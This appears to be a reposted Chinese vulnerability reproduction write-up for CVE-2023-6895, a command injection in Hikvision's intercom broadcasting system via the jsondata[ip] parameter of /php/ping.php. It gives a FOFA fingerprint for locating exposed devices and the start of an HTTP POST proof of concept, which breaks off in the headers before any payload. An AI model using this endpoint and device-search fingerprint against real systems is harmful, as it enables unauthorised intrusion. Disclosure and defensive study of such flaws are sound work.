当前位置: 首页 > news >正文

海康威视对讲广播系统 RCE漏洞复现(CVE-2023-6895)

news 2025/7/27 22:05:13

0x01 产品简介

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。

0x02 漏洞概述

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

0x03 影响范围

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)

0x04 复现环境

FOFA:icon_hash="-1830859634"

b8af0f9d4ef4403e86e5da9526a47eae.png

0x05 漏洞复现

PoC

POST /php/ping.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Re
http://www.lryc.cn/news/264065.html

相关文章:

  • 【优化】Springboot 修改 tomcat连接池
  • 百度侯震宇:AI原生与大模型将从三个层面重构云计算
  • 【SpringBoot快速入门】(2)SpringBoot的配置文件与配置方式详细讲解
  • 麒麟V10 ARM 离线生成RabbitMQ docker镜像并上传Harbor私有仓库
  • AI创作系统ChatGPT商业运营网站系统源码,支持AI绘画,GPT语音对话+DALL-E3文生图
  • 剑指offer题解合集——Week1day5
  • Redis设计与实现之数据库
  • 如何在Eclipse中安装WindowBuilder插件,详解过程
  • node.js mongoose schemaTypes
  • 论文解读:On the Integration of Self-Attention and Convolution
  • 【Spring】15 ApplicationContextAware 接口
  • Android 版本控制工具--Git
  • Wireshark高级网络安全分析
  • llvm后端之DAG设计
  • 反序列化 [SWPUCTF 2021 新生赛]ez_unserialize
  • centos(linux)安装jenkins
  • Wireshark统计和可视化
  • 高通平台开发系列讲解(SIM卡篇)SIM软件架构介绍
  • 音频筑基:瞬态、基音、偏噪信号类型分析
  • HarmonyOS ArkTS 中DatePicker先择时间 路由跳转并传值到其它页
  • Axure RP 8 for Mac/win中文版:打造完美交互式原型设计体验
  • 迪文屏开发保姆级教程——页面键盘
  • Unity的UI界面——Text/Image
  • sklearn和tensorflow的理解
  • css中BFC
  • 华为OD机试 - 小朋友来自多少小区(Java JS Python C)
  • 前端:NPM的介绍和使用
  • 力扣57. 插入区间
  • Linux c++开发-11-Socket TCP编程简单案例
  • ros2机器人常规控制流程